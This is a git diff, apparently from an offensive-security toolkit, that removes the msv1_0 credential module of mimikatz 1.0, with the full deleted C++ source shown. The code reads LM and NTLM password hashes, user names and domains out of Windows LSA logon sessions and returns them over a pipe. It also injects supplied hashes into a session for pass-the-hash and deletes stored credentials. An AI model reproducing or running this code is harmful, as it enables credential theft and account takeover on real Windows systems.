Diffstat (limited to 'Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages')
-rw-r--r--Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp153
-rw-r--r--Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h16
-rw-r--r--Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp53
-rw-r--r--Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h28
4 files changed, 0 insertions, 250 deletions
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp
deleted file mode 100644
index b429e5a..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp
+++ /dev/null
@@ -1,153 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "msv1_0.h"
-
-bool searchMSVFuncs()
-{
- if(!MSV1_0_MspAuthenticationPackageId)
- MSV1_0_MspAuthenticationPackageId = (mod_system::GLOB_Version.dwBuildNumber < 7000) ? 2 : 3;
- return (searchLSAFuncs() && (MSV1_0_MspAuthenticationPackageId != 0));
-}
-
-bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity)
-{
- wostringstream maReponse;
- if(searchMSVFuncs())
- {
- unsigned short reservedSize = 0;
- PMSV1_0_PRIMARY_CREDENTIAL kiwiCreds = NULL;
- if(NT_SUCCESS(NlpGetPrimaryCredential(logId, &kiwiCreds, &reservedSize)))
- {
- wstring lmHash = mod_text::stringOfHex(kiwiCreds->LmOwfPassword, sizeof(kiwiCreds->LmOwfPassword));
- wstring ntHash = mod_text::stringOfHex(kiwiCreds->NtOwfPassword, sizeof(kiwiCreds->NtOwfPassword));
-
- if(justSecurity)
- maReponse << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }";
- else
- {
- maReponse << endl <<
- L"\t * Utilisateur : " << mod_text::stringOfSTRING(kiwiCreds->UserName) << endl <<
- L"\t * Domaine : " << mod_text::stringOfSTRING(kiwiCreds->LogonDomainName) << endl <<
- L"\t * Hash LM : " << lmHash << endl <<
- L"\t * Hash NTLM : " << ntHash;
- }
- SeckPkgFunctionTable->FreeLsaHeap(kiwiCreds);
- }
- else maReponse << L"n.t. (LUID KO)";
- }
- else maReponse << L"n.a. (msv KO)";
-
- return sendTo(monPipe, maReponse.str());
-}
-
-__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments)
-{
- vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider;
- monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getMSVLogonData, wstring(L"msv1_0")));
- return getLogonData(monPipe, mesArguments, &monProvider);
-}
-
-__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments)
-{
- wostringstream maReponse;
- if(searchMSVFuncs())
- {
- if(!mesArguments->empty() && mesArguments->size() >= 1 && mesArguments->size() <= 2)
- {
- wstring idSecAppHigh = L"0";
- wstring idSecAppLow = mesArguments->front();
- if(mesArguments->size() > 1)
- {
- idSecAppHigh = mesArguments->front(); idSecAppLow = mesArguments->back();
- }
-
- LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow);
- if(idApp.LowPart != 0 || idApp.HighPart != 0)
- maReponse << (NT_SUCCESS(NlpDeletePrimaryCredential(&idApp)) ? L"Suppression des données de sécurité réussie :)" : L"Suppression des données de sécurité en échec :(");
- else maReponse << L"LUID incorrect !";
- }
- else maReponse << L"Format d\'appel invalide : delLogonSession [idSecAppHigh] idSecAppLow";
- }
- else maReponse << L"n.a. (msv KO)";
-
- maReponse << endl;
- return sendTo(monPipe, maReponse.str());
-}
-
-__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments)
-{
- wostringstream maReponse;
- if(searchMSVFuncs())
- {
- if(!mesArguments->empty() && mesArguments->size() >= 4 && mesArguments->size() <= 6)
- {
- MSV1_0_PRIMARY_CREDENTIAL kiwicreds;
- RtlZeroMemory(&kiwicreds, sizeof(MSV1_0_PRIMARY_CREDENTIAL));
-
- wstring idSecAppHigh = L"0", idSecAppLow, userName, domainName, lmHash, ntlmHash = mesArguments->back();
- kiwicreds.LmPasswordPresent = FALSE;
- kiwicreds.NtPasswordPresent = TRUE;
-
- switch(mesArguments->size()) // méchants arguments utilisateurs
- {
- case 4:
- idSecAppLow = mesArguments->front();
- userName = mesArguments->at(1);
- domainName = mesArguments->at(2);
- break;
- case 6:
- idSecAppHigh = mesArguments->front();
- idSecAppLow = mesArguments->at(1);
- userName = mesArguments->at(2);
- domainName = mesArguments->at(3);
- kiwicreds.LmPasswordPresent = TRUE;
- lmHash = mesArguments->at(4);
- break;
- case 5:
- if(mesArguments->at(3).size() == 0x20)
- {
- idSecAppLow = mesArguments->front();
- userName = mesArguments->at(1);
- domainName = mesArguments->at(2);
- kiwicreds.LmPasswordPresent = TRUE;
- lmHash = mesArguments->at(3);
- }
- else
- {
- idSecAppHigh = mesArguments->front();
- idSecAppLow = mesArguments->at(1);
- userName = mesArguments->at(2);
- domainName = mesArguments->at(3);
- }
- break;
- }
-
- LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow);
-
- if(idApp.LowPart != 0 || idApp.HighPart != 0)
- {
- if((!kiwicreds.LmPasswordPresent || (lmHash.size() == 0x20)) && ntlmHash.size() == 0x20 && userName.size() <= MAX_USERNAME_LEN && domainName.size() <= MAX_DOMAIN_LEN)
- {
- mod_text::InitLsaStringToBuffer(&kiwicreds.UserName, userName, kiwicreds.BuffUserName);
- mod_text::InitLsaStringToBuffer(&kiwicreds.LogonDomainName, domainName, kiwicreds.BuffDomaine);
- if(kiwicreds.LmPasswordPresent)
- mod_text::wstringHexToByte(lmHash, kiwicreds.LmOwfPassword);
- mod_text::wstringHexToByte(ntlmHash, kiwicreds.NtOwfPassword);
-
- maReponse << (NT_SUCCESS(NlpAddPrimaryCredential(&idApp, &kiwicreds, sizeof(kiwicreds))) ? L"Injection de données de sécurité réussie :)" : L"Injection de données de sécurité en échec :(");
- }
- else maReponse << L"Les hashs LM et NTLM doivent faire 32 caractères, le nom d\'utilisateur et le domaine/poste au maximum 22 caractères";
- }
- else maReponse << L"LUID incorrect !";
- }
- else maReponse << L"Format d\'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur {Domaine|Poste} [HashLM] HashNTLM";
- }
- else maReponse << L"n.a. (msv KO)";
-
- maReponse << endl;
- return sendTo(monPipe, maReponse.str());
-}
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h
deleted file mode 100644
index 4749573..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h
+++ /dev/null
@@ -1,16 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../sekurlsa.h"
-#include "msv1_0_helper.h"
-
-bool searchMSVFuncs();
-bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity);
-
-__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments);
-__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments);
-__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments);
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp
deleted file mode 100644
index 7ccb8e5..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp
+++ /dev/null
@@ -1,53 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "msv1_0_helper.h"
-DWORD MSV1_0_MspAuthenticationPackageId = 0;
-
-void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative)
-{
- if(String->Buffer)
- String->Buffer = reinterpret_cast<wchar_t *>(reinterpret_cast<ULONG_PTR>(String->Buffer) + ((relative ? -1 : 1) * reinterpret_cast<ULONG_PTR>(BaseAddress)));
-}
-
-NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short CredentialSize)
-{
- STRING PrimaryKeyValue, CredentialString;
- mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY);
-
- NlpMakeRelativeOrAbsoluteString(Credential, &Credential->UserName);
- NlpMakeRelativeOrAbsoluteString(Credential, &Credential->LogonDomainName);
- CredentialString.Buffer = reinterpret_cast<char *>(Credential);
- CredentialString.MaximumLength = CredentialString.Length = CredentialSize;
- SeckPkgFunctionTable->LsaProtectMemory(CredentialString.Buffer, CredentialString.Length);
- return SeckPkgFunctionTable->AddCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue, &CredentialString );
-}
-
-NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize)
-{
- ULONG QueryContext = 0, PrimaryKeyLength;
- STRING PrimaryKeyValue, CredentialString;
- mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY);
-
- NTSTATUS retour = SeckPkgFunctionTable->GetCredentials(LogonId, MSV1_0_MspAuthenticationPackageId, &QueryContext, FALSE, &PrimaryKeyValue, &PrimaryKeyLength, &CredentialString);
- if(NT_SUCCESS(retour))
- {
- SeckPkgFunctionTable->LsaUnprotectMemory(CredentialString.Buffer, CredentialString.Length);
- *Credential = (PMSV1_0_PRIMARY_CREDENTIAL) CredentialString.Buffer;
- NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->UserName), false);
- NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->LogonDomainName), false);
- if (CredentialSize)
- *CredentialSize = CredentialString.Length;
- }
- return retour;
-}
-
-NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId)
-{
- STRING PrimaryKeyValue;
- mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY);
- return SeckPkgFunctionTable->DeleteCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue);
-} \ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h
deleted file mode 100644
index e9afd03..0000000
--- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h
+++ /dev/null
@@ -1,28 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../sekurlsa.h"
-
-#define MSV1_0_PRIMARY_KEY "Primary"
-extern DWORD MSV1_0_MspAuthenticationPackageId;
-
-typedef struct _MSV1_0_PRIMARY_CREDENTIAL {
- LSA_UNICODE_STRING LogonDomainName;
- LSA_UNICODE_STRING UserName;
- BYTE NtOwfPassword[0x10];
- BYTE LmOwfPassword[0x10];
- BOOLEAN NtPasswordPresent;
- BOOLEAN LmPasswordPresent;
- wchar_t BuffDomaine[MAX_DOMAIN_LEN];
- wchar_t BuffUserName[MAX_USERNAME_LEN];
-} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL;
-
-void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative = true);
-
-NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short CredentialSize);
-NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize);
-NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId);